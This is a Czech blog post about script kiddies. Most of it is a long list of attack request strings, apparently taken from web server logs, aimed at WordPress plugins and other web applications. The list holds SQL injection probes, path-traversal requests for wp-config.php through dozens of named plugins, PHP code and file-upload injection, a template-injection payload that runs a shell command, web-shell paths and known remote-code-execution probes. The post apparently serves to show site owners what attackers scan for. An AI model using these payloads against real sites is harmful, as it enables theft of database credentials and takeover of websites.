Script kiddies. Jak získat heslo pomocí Arbitrary File Download zranitelnosti?

script kiddie

Oblíbené řetězce script kiddies jedné z technik k“ prolomení zabezpečení“ není tak ani o prolomení jako o napsání URL do adresního řádku prohlížeče. Bezpracný získ hesla do redakčního systému (i databáze) nestojí víc, než vepsání několika znaků (za řádnou adresu webu). Když pak webová stránka hostuje postižený plugin, přístup do administrace je prozrazen. Oblíbené testovací řetězce používané script kiddies pro získání přístupu je tedy obvykle hledání tam kde není; několik let neaktualizovaný plugin předpokládejme hostuje zlomek webových stránek.

Skript kiddie, skiddie nebo skid je relativně nekvalifikovaný člověk, který používá skripty nebo programy, jako je například webový shell, vyvinuté jinými osobami k útokům na počítačové systémy a sítě a k poškozování webových stránek, podle kultury programování a hackingu.

Obecně se předpokládá, že většina script kiddies jsou mladiství, kteří nemají schopnost sami psát sofistikované programy nebo exploity a že jejich cílem je snaha zapůsobit na své přátele nebo získat kredit v komunitách počítačových nadšenců. Tento termín však nemusí nutně souviset se skutečným věkem účastníka. Termín je nemusí automaticky nikoho hanit i když je považován za hanlivý. Existují místa kde tímto výrazem složíte leckomu poklonu

Čím penetrují mladí chlapci?

Jedná se prakticky většinou o automatizované dotazy na dlouhou dobu známé zranitelnosti či přímo chyby, zálohy nebo neaktualizované pluginy. Prakticky 99% publikovaných chyb (na packet storm, exploitdb, wpscan..) jsou zranitelnosti typu Authenticated Directory Traversal nebo Arbitrary File Download

XSS Heslo

php?action=postpass&post_password=1
php?action=postpass%3BSELECT%20PG_SLEEP%285%29--&post_password=1
php?action=postpass%27%29%3BSELECT%20PG_SLEEP%285%29--&post_password=1
php?pubkey=f7147105f08270ed388922e582a0ea17&bvTime=1649700574&bvVersion=0.1&bvMethod=dummyping&sha1=true&sig=eb2730da574fe82581c3141311711fe92e312364
php?action=postpass%27%3BSELECT%20PG_SLEEP%285%29--&post_password=1
php?action=-1459%20UNION%20ALL%20SELECT%20NULL%2C%27qbxkq%27%7C%7C%27YicTfdZvoA%27%7C%7C%27qpzqq%27--%20BVVY&post_password=1
php?action=-3222%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27IIktdiPLZI%27%7C%7C%27qpzqq%27%2CNULL--%20EtjN&post_password=1
php?action=-6942%20UNION%20ALL%20SELECT%20NULL%2C%27qbxkq%27%7C%7C%27ApaNzbwTMMFepOWTzpeRcRCcymbsguOjaYjSIhVE%27%7C%7C%27qpzqq%27--%20ZzYf&post_password=1
php?action=postpass%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=postpass%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27trUgQDPpBgDtiFpZuEyLTtWSnkqQEYmYoTAmyVba%27%7C%7C%27qpzqq%27%2C64--%20nAwy&post_password=1
php?action=postpass%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1

php?action=postpass%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27geEszrJMbjjZFplzVPFmrGGTphFLwwHEahthdgDs%27%7C%7C%27qpzqq%27--%20QVxI&post_password=1
php?action=postpass%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=postpass%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27HAYCKGiYzD%27%7C%7C%27qpzqq%27%2C64--%20AdPO&post_password=1
php?action=postpass%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=postpass%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27GXMtHsAkwH%27%7C%7C%27qpzqq%27--%20PHmf&post_password=1
php?action=postpass%25%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=-4110%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27qGBjdcAaGCkOIdgLJkTOEoNLFtVQICWCIVeolVQE%27%7C%7C%27qpzqq%27--%20LmkG&post_password=1
php?action=postpass%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28111%29%7C%7CCHR%28115%29%7C%7CCHR%2886%29%2C5%29%20FROM%20DUAL--&post_password=1

php?action=-5975%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27pKEjrDJHDKbmGbMCUXmqMgssjfNCFIJImXPujyuM%27%7C%7C%27qpzqq%27%2C64--%20zNZx&post_password=1
php?action=postpass%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28111%29%7C%7CCHR%28115%29%7C%7CCHR%2886%29%2C5%29%20FROM%20DUAL--&post_password=1
php?action=-7774%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27NgXwRlEMBV%27%7C%7C%27qpzqq%27--%20Nifn&post_password=1
php?action=-3195%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27tFmYjfGKPx%27%7C%7C%27qpzqq%27%2C64--%20CvNh&post_password=1
php?action=postpass%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28111%29%7C%7CCHR%28115%29%7C%7CCHR%2886%29%2C5%29%20FROM%20DUAL--&post_password=1
?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d

php?action=postpass%27%29%20ORDER%20BY%201--%20yWRe&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL--%20hfjb&post_password=1
php?action=postpass%29%20AND%20SLEEP%285%29%20AND%20%287065%3D7065&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20gZmh&post_password=1
php?action=postpass%20AND%20SLEEP%285%29&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20TVag&post_password=1
php?action=postpass%27%29%20AND%20SLEEP%285%29%20AND%20%28%27AYDT%27%3D%27AYDT&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20ljlb&post_password=1

php?action=postpass%27%20AND%20SLEEP%285%29%20AND%20%27fakp%27%3D%27fakp&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZTdY&post_password=1
php?action=postpass%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20WoWn&post_password=1
php?action=postpass%20AND%20SLEEP%285%29--%20TuEq&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZCuL&post_password=1
php?action=postpass%29%20AND%208964%3D%28SELECT%208964%20FROM%20PG_SLEEP%285%29%29%20AND%20%284705%3D4705&post_password=1
php?pubkey=f7147105f08270ed388922e582a0ea17&bvTime=1643566113&bvVersion=0.1&bvMethod=dummyping&sha1=true&sig=f3d68f7f21aff8b29af33bf9b96ffcfaa39f715a
php?sfilename=on.php&sfilecontent=<%3F%3D409723%2A20%3B&supfiles=on.php

Script kiddie like pluginy

php?action=as_async_request_queue_runner&nonce=8b7c7800dd
php?sig=beima&domain=contentmarketingminds.com&shell_file=wp-login&file_name=/xxx.txt
php?action=as_async_request_queue_runner&nonce=3ebd1178
/wp-content/plugins/zedd/1.php
php?action=p3dlite_handle_upload
php?action=duplicator_download&file=..%2Fwp-config.php
php?action=duplicator_download&file=%2F..%2Fwp-config.php
php?action=duplicator_download&file=../wp-config.php
php?action=kbslider_show_image&img=../wp-config.php
php?/albums/&preview=elementary/a:<?=print(43543534534-567567567);?>

php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
php?page=ELISQLREPORTS-settings&Download_SQL_Backup=..%2Fwp-config.php
php?page=all-in-one-video-gallery&tab=..%2Fwp-config.php
php?page=checkout_editor_settings&tcp_box_path=..%2Fwp-config.php
php?page=dmsguestbook&advanced=1&folder=language&file=..%2Fwp-config.php

php?page=miwoftp&option=com_miwoftp&action=download&item=..%2Fwp-config.php&order=name&srt=yes
php?page=newsletters-history&wpmlmethod=exportdownload&file=..%2Fwp-config.php
php?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php
php?page=wp-db-backup.php&backup=..%2Fwp-config.php
php?action=p3dlite_handle_upload
php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php
php?page=supsystic-backup&tab=bupLog&download=/../wp-config.php
?post=application_id&action=edit&sjb_file=..%2Fwp-config.php
?page=wysija_campaigns&action=themes
?action=uploadFontIcon
?action=..%2Fwp-config.php
?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php
?action=kbslider_show_image&img=..%2Fwp-config.php
?page=miwoftp&option=com_miwoftp&action=download&dir=%2F&item=wp-config.php&order=name&srt=yes

?page=miwoftp&option=com_miwoftp&action=download&item=..%2Fwp-config.php&order=name&srt=yes
?page=newsletters-history&wpmlmethod=exportdownload&file=..%2Fwp-config.php
?page=wp-db-backup.php&backup=..%2Fwp-config.php
?post_type=wd_ads_ads&export=export_csv&path=..%2Fwp-config.php
?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php
?page=backup_manager&download_backup_file=..%2Fwp-config.php
?page=ELISQLREPORTS-settings&Download_SQL_Backup=..%2Fwp-config.php
?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php
?action=getfile&/../wp-config.php
?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php
/wp-content/plugins/wpeasystats/export.php?homep=../../../wp-config.php	1
/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../wp-config.php
/wp-admin/admin-ajax.php?action=nf_fu_upload

/wp-includes/991176.php
/wp-content/plugins/masterx/ran.php
/wp-content/plugins/wp-json-api-disable/wwdv.php
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=../../../wp-config.php
?page=ELISQLREPORTS-settings&Download_SQL_Backup=../wp-config.php
?action=revslider_show_image&img=../wp-config.php
?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
?action=kbslider_show_image&img=../wp-config.php
?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php

admin-ajax.php?action=woof_redraw_woof&shortcode=..%2Fwp-config.php
admin-ajax.php?jvfrm_spot_get_json&fn=..%2Fwp-config.php
admin-ajax.php?motor_load_more=..%2Fwp-config.php
post.php?post=application_id&action=edit&sjb_file=..%2Fwp-config.php
/JST10x.php?v36437=346548
/wp-coreutils.php?v36437=346548

Funkce + Zranitelnosti

/phpunit/src/Util/PHP/eval-stdin.php
php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
/?XDEBUG_SESSION_START=phpstorm
/mifs/.;/services/LogService
/Autodiscover/Autodiscover.xml
php?action=tcp_register_and_login_ajax
/mifs/.;/services/LogService
/?sfilename=on.php&sfilecontent=<%3F%3D409723%2A20%3B&supfiles=on.php
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/s/34352e38382e3138382e3836/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties

Resumé

Zdaleka nejčastěji testovanou zranitelnosti je Arbitrary File Download (Neověřeného stažení libovolného souboru) nalezenou v pluginu KenBurner Slider (kbslider) v roce 2014 :)

Vizualizace

Script Kiddies XSS řetězce heslo
Script Kiddies XSS řetězce

Užitečné

Definice skript kiddie na wikipedia.
Povídka jak penetrují mladí chlapci na phpfashion.cz
Text ISPconfig + Varnish cache.

TelegramFacebookE-Mail

Související příspěvky:

  1. Chyba source file export databáze z phpMyAdmin
  2. Jak získat bad bot IP adresy Amazon cloud služby AWS Cloudfront
  3. Home Assistant. Jak získat teplotu místnosti z Netatmo Smart Radiator Valve?
  4. Generujeme .pot soubor pomocí wp cli příkazu
ICTIS.CZ